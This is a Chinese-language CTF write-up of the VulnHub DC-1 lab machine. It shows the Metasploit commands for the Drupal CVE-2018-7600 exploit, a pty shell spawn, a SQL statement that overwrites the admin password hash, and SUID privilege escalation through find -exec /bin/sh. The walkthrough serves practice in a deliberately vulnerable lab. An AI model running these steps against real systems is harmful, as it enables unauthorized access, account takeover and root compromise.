vulnhub靶机 DC1 练习
vulnhub靶机 DC1 练习
DC靶机的内网渗透,简介里说我们要找出5个flge就算通关了
开始
靶场启动后我们内网扫一波找出靶机的ip地址,这里我们用nmap扫。
端口扫描:
这里我们访问一下开放的80端口:
在百度搜索drupal存在远程代码执行漏洞
CVE-2018-7600远程代码执行漏洞复现
这里我们直接用msf进行复现:
search CVE-2018-7600 搜索复现模块
use 模块路径
show options
set RHOST 目标ip
run
查看一下当前的用户权限:
whoaml
这里我们就在当前位置到到了第一个flag
查看第一个文件提示:
这里我们就找找cms的配置文件,并打开他。
这里我们就找到了第二个flag
这意思应该是要让我们提权,但是没思路,但是看到了数据库的账号密码可以连接试试。
试了几次发现登不上,去看了看别个做的,发现要先获取一个python的标准shell
python -c “import pty;pty.spawn(’/bin/bash’)”
获取标准shell后就成功登上了mysql。
接下来查看当前数据库
show databases; //查看所有数据库
show tables; //查表
再进入数据库查表:
看见一个user表看看里面的数据:
select * from 表名;
查看到了账号密码看能不能替换了,但是他的密码是经过加密的用了该cms特有的hash算法。接下来找hash加密文件。
把加密下来的密码复制现在替换掉数据库里面的密码
update users set pass="$S$DsilJYj0DZUjqVvQBVt72POhIUf/Wh9rj1f6pjDrznjcfhJLzJ29" where name="admin";
修改后直接登录。
可以在这里面发现flag3:
flag4就在home目录里,打开就行了。
这里的提示大概就是线索在root目录里面但是没有权限。
果然没有,这里就需要提权了。我这里使用suid提权。
已知的可用来提权的linux可行性的文件列表如下:
Nmap
Vim
find
Bash
More
Less
Nano
cp
以下命令可以发现系统上运行的所有SUID可执行文件。
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \
我们来查看是root权限运行的文件:
发现能利用的只有/usr/bin/find,确认一下是不是root权限运行。
ls -lh /usr/bin/find
确认是root权限后执行以下命令;
find ./ aaa -exec '/bin/sh' \;
获取root权限后就可以打开root文件里找到最后一个flga了。
结束!!!!!!